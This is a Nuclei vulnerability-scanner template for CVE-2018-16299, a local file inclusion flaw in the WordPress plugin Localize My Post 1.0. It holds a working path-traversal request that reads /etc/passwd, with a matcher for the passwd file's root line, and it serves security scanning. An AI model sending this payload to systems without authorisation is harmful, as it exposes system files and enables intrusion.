nuclei-templates/cves/2018/CVE-2018-16299.yaml

25 lines
522 B
YAML

id: CVE-2018-16299
info:
name: WordPress Plugin Localize My Post 1.0 - LFI
author: 0x_Akoko
severity: high
reference: https://www.exploit-db.com/exploits/45439
tags: wordpress,cve2018,cve,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200